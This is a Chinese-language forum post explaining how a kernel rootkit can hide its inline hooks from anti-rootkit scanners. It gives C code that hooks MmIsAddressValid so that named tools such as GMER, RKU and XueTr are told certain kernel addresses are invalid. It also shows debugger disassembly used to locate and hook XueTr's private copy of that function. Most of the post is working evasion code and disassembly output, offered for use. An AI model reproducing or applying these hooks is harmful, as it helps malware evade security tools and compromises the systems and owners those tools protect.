- 注册时间
- 2011-3-6
- 最后登录
- 1970-1-1
该用户从未签到
|
隐藏inlinehook已经不是新鲜招数了,因为我们有隐藏更彻底的hook,木有ark能扫得到,so,这个老技术是时候解封了。
其实就是hook MmIsAddressValid(肯定会有N多人鄙视我了。)
代码:
//适用:gmer,rku,KD
BOOLEAN __stdcall NewMmIsAddressValid(
__in PVOID VirtualAddress
)
{
MMISADDRESSVALID OldMmIsAddressValid;
PEPROCESS EProcess;
char *ProName = NULL;
__try{
if (KeGetCurrentIrql() != PASSIVE_LEVEL){
__leave;
}
EProcess = PsGetCurrentProcess();
ProName = PsGetProcessImageFileName(EProcess);
if (!ProName){
__leave;
}
if (strstr(ProName,"123123.exe") != 0)
{
KdPrint(("%s -> %08x\n",ProName,VirtualAddress));
//
if (VirtualAddress == 0x80511000 ||
VirtualAddress == 0x805c8000)
{
return FALSE;
}
}
}
__except(EXCEPTION_EXECUTE_HANDLER){
goto _FuncRet;
}
_FuncRet:
OldMmIsAddressValid = (MMISADDRESSVALID)MmIsAddressValidHookZone;
return OldMmIsAddressValid(VirtualAddress);
}
你以为到此就完了吗?下面重点说说xuetr~~
xuetr自实现了一个MmIsxxxxxxx,难点在于怎么定位到xuetr的这个函数~~
如果你认认真真看过A盾的代码,就知道自己实现MmIsxxxxxxx会有一个特征码:
代码:
__inline ULONG CR4()
{
// mov eax, cr4
__asm _emit 0x0F __asm _emit 0x20 __asm _emit 0xE0
}
mov eax, cr4 //机器码是:0F 20 E0 即可准确定位到xuetr自己实现的MmIsAddressValid函数了
代码:
lkd> dt_driver_object 82256030
nt!_DRIVER_OBJECT
+0x000 Type : 4
+0x002 Size : 168
+0x004 DeviceObject : 0x82464cf0 _DEVICE_OBJECT
+0x008 Flags : 0x12
+0x00c DriverStart : 0xb2142000
+0x010 DriverSize : 0x70000
+0x014 DriverSection : 0x81f70008
+0x018 DriverExtension : 0x822560d8 _DRIVER_EXTENSION
+0x01c DriverName : _UNICODE_STRING "\Driver\XueTr"
+0x024 HardwareDatabase : 0x80671b60 _UNICODE_STRING "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
+0x028 FastIoDispatch : (null)
+0x02c DriverInit : 0xb21a203e long +ffffffffb21a203e <--------定位这里
+0x030 DriverStartIo : (null)
+0x034 DriverUnload : 0xb2190e34 void +ffffffffb2190e34
+0x038 MajorFunction : [28] 0xb2190f5e long +ffffffffb2190f5e
//===================================================================
lkd> u 0xb21a203e
b21a203e 8bff mov edi,edi
b21a2040 55 push ebp
b21a2041 8bec mov ebp,esp
b21a2043 e8bdffffff call b21a2005
b21a2048 5d pop ebp
b21a2049 e9f8f9feff jmp b2191a46 <--------定位这里
b21a204e cc int 3
b21a204f cc int 3
//=================================================
lkd> u b2191a46 l 100
b2191a46 8bff mov edi,edi
b2191a48 55 push ebp
b2191a49 8bec mov ebp,esp
b2191a4b 83ec20 sub esp,20h
b2191a4e 53 push ebx
b2191a4f 56 push esi
b2191a50 57 push edi
b2191a51 50 push eax
b2191a52 8b4504 mov eax,dword ptr [ebp+4]
b2191a55 8945f4 mov dword ptr [ebp-0Ch],eax
b2191a58 58 pop eax
b2191a59 8b750c mov esi,dword ptr [ebp+0Ch]
b2191a5c 8b4604 mov eax,dword ptr [esi+4]
b2191a5f c745fc010000c0 mov dword ptr [ebp-4],0C0000001h
b2191a66 85c0 test eax,eax
b2191a68 0f8406020000 je b2191c74
b2191a6e 50 push eax
b2191a6f ff15285019b2 call dword ptr ds:[0B2195028h]
b2191a75 3c01 cmp al,1
b2191a77 0f85f7010000 jne b2191c74
b2191a7d 0fb73e movzx edi,word ptr [esi]
b2191a80 33c0 xor eax,eax
b2191a82 663bc7 cmp ax,di
b2191a85 0f84e9010000 je b2191c74
b2191a8b e860ffffff call b21919f0
b2191a90 3c01 cmp al,1
b2191a92 0f85dc010000 jne b2191c74
b2191a98 6a02 push 2
b2191a9a 5b pop ebx
b2191a9b 0fb7c7 movzx eax,di
b2191a9e 03c3 add eax,ebx
b2191aa0 50 push eax
b2191aa1 6a01 push 1
b2191aa3 ff15fc5019b2 call dword ptr ds:[0B21950FCh]
b2191aa9 8bf8 mov edi,eax
b2191aab 897df0 mov dword ptr [ebp-10h],edi
b2191aae 85ff test edi,edi
b2191ab0 0f84be010000 je b2191c74
b2191ab6 0fb706 movzx eax,word ptr [esi]
b2191ab9 03c3 add eax,ebx
b2191abb 50 push eax
b2191abc 6a00 push 0
b2191abe 57 push edi
b2191abf e8822e0000 call b2194946
b2191ac4 0fb706 movzx eax,word ptr [esi]
b2191ac7 50 push eax
b2191ac8 ff7604 push dword ptr [esi+4]
b2191acb 57 push edi
b2191acc e8692e0000 call b219493a
b2191ad1 6a5c push 5Ch
b2191ad3 57 push edi
b2191ad4 ff15f45019b2 call dword ptr ds:[0B21950F4h]
b2191ada 83c420 add esp,20h
b2191add 85c0 test eax,eax
b2191adf 740c je b2191aed
b2191ae1 03c3 add eax,ebx
b2191ae3 33c9 xor ecx,ecx
b2191ae5 89450c mov dword ptr [ebp+0Ch],eax
b2191ae8 663b08 cmp cx,word ptr [eax]
b2191aeb 7503 jne b2191af0
b2191aed 897d0c mov dword ptr [ebp+0Ch],edi
b2191af0 e87309fdff call b2162468
b2191af5 ff750c push dword ptr [ebp+0Ch]
b2191af8 e84bfeffff call b2191948
b2191afd 33c0 xor eax,eax
b2191aff 0fb788a24d19b2 movzx ecx,word ptr [eax-4DE6B25Eh]
b2191b06 668988a0151ab2 mov word ptr [eax-4DE5EA60h],cx
b2191b0d 03c3 add eax,ebx
b2191b0f 6685c9 test cx,cx
b2191b12 75eb jne b2191aff
b2191b14 bea0151ab2 mov esi,0B21A15A0h
b2191b19 8bc6 mov eax,esi
b2191b1b 8d5002 lea edx,[eax+2]
b2191b1e 668b08 mov cx,word ptr [eax]
b2191b21 03c3 add eax,ebx
b2191b23 6685c9 test cx,cx
b2191b26 75f6 jne b2191b1e
b2191b28 8b3df05019b2 mov edi,dword ptr ds:[0B21950F0h]
b2191b2e 2bc2 sub eax,edx
b2191b30 d1f8 sar eax,1
b2191b32 b900010000 mov ecx,100h
b2191b37 2bc8 sub ecx,eax
b2191b39 51 push ecx
b2191b3a ff750c push dword ptr [ebp+0Ch]
b2191b3d 56 push esi
b2191b3e ffd7 call edi
b2191b40 83c40c add esp,0Ch
b2191b43 e8b802fdff call b2161e00
b2191b48 ff75f4 push dword ptr [ebp-0Ch]
b2191b4b 8b5d08 mov ebx,dword ptr [ebp+8]
b2191b4e 53 push ebx
b2191b4f e8bc46fdff call b2166210
b2191b54 e8b715fbff call b2143110 <--------定位这里
//====================
lkd> u b2143110 l 100
b2143110 8bff mov edi,edi
b2143112 55 push ebp
b2143113 8bec mov ebp,esp
b2143115 83ec14 sub esp,14h
b2143118 53 push ebx
b2143119 6a03 push 3
b214311b c645ff00 mov byte ptr [ebp-1],0
b214311f e8c4300200 call b21661e8
b2143124 8bd8 mov ebx,eax
b2143126 6a02 push 2
b2143128 895dec mov dword ptr [ebp-14h],ebx
b214312b e8b8300200 call b21661e8
b2143130 8945f8 mov dword ptr [ebp-8],eax
b2143133 85db test ebx,ebx
b2143135 0f84b6020000 je b21433f1
b214313b 85c0 test eax,eax
b214313d 0f84ae020000 je b21433f1
b2143143 56 push esi
b2143144 57 push edi
b2143145 8b7b14 mov edi,dword ptr [ebx+14h]
b2143148 8b37 mov esi,dword ptr [edi]
b214314a 685c005300 push 53005Ch
b214314f 6a04 push 4
b2143151 897df0 mov dword ptr [ebp-10h],edi
b2143154 e875300200 call b21661ce
b2143159 6879007300 push 730079h
b214315e 6a05 push 5
b2143160 e869300200 call b21661ce
b2143165 6874006500 push 650074h
b214316a 6a06 push 6
b214316c e85d300200 call b21661ce
b2143171 686d005200 push 52006Dh
b2143176 6a07 push 7
b2143178 e851300200 call b21661ce
b214317d 686f006f00 push 6F006Fh
b2143182 6a08 push 8
b2143184 e845300200 call b21661ce
b2143189 6874005c00 push 5C0074h
b214318e 6a09 push 9
b2143190 e839300200 call b21661ce
b2143195 6873007900 push 790073h
b214319a 6a0a push 0Ah
b214319c e82d300200 call b21661ce
b21431a1 6873007400 push 740073h
b21431a6 6a0b push 0Bh
b21431a8 e821300200 call b21661ce
b21431ad 6865006d00 push 6D0065h
b21431b2 6a0c push 0Ch
b21431b4 e815300200 call b21661ce
b21431b9 6833003200 push 320033h
b21431be 6a0d push 0Dh
b21431c0 e809300200 call b21661ce
b21431c5 3bfe cmp edi,esi
b21431c7 0f841f010000 je b21432ec
b21431cd 8b4e18 mov ecx,dword ptr [esi+18h]
b21431d0 8b150c5119b2 mov edx,dword ptr ds:[0B219510Ch]
b21431d6 8b4620 mov eax,dword ptr [esi+20h]
b21431d9 8b12 mov edx,dword ptr [edx]
b21431db 03c1 add eax,ecx
b21431dd 894df4 mov dword ptr [ebp-0Ch],ecx
b21431e0 3bca cmp ecx,edx
b21431e2 0f86ed000000 jbe b21432d5
b21431e8 3bc2 cmp eax,edx
b21431ea 0f86e5000000 jbe b21432d5
b21431f0 394df8 cmp dword ptr [ebp-8],ecx
b21431f3 0f86dc000000 jbe b21432d5
b21431f9 3945f8 cmp dword ptr [ebp-8],eax
b21431fc 0f83d3000000 jae b21432d5
b2143202 8b15145119b2 mov edx,dword ptr ds:[0B2195114h]
b2143208 3bd1 cmp edx,ecx
b214320a 0f86c5000000 jbe b21432d5
b2143210 3bd0 cmp edx,eax
b2143212 0f83bd000000 jae b21432d5
b2143218 81f900000090 cmp ecx,90000000h
b214321e 0f83b1000000 jae b21432d5
b2143224 66837e2404 cmp word ptr [esi+24h],4
b2143229 0f86a6000000 jbe b21432d5
b214322f 8b4628 mov eax,dword ptr [esi+28h]
b2143232 85c0 test eax,eax
b2143234 0f849b000000 je b21432d5
b214323a 6a01 push 1
b214323c 50 push eax
b214323d e872ab0300 call b217ddb4 <--------定位这里就是xuetr自己的MmIsAddressValid
然后没区别了:
代码:
//bypass xuetr
BOOLEAN __stdcall NewXuetrMmIsAddressValid(
__in PVOID VirtualAddress,
__in int Type
)
{
XUETRMMISADDRESSVALID OldXuetrMmIsAddressValid;
KdPrint(("%08x\n",VirtualAddress));
if (VirtualAddress == 0x804fe000)
{
return FALSE;
}
OldXuetrMmIsAddressValid = (XUETRMMISADDRESSVALID)XuetrMmIsAddressValidHookZone;
return OldXuetrMmIsAddressValid(VirtualAddress,Type);
} |
|
发表于 2013-4-27 09:22:06
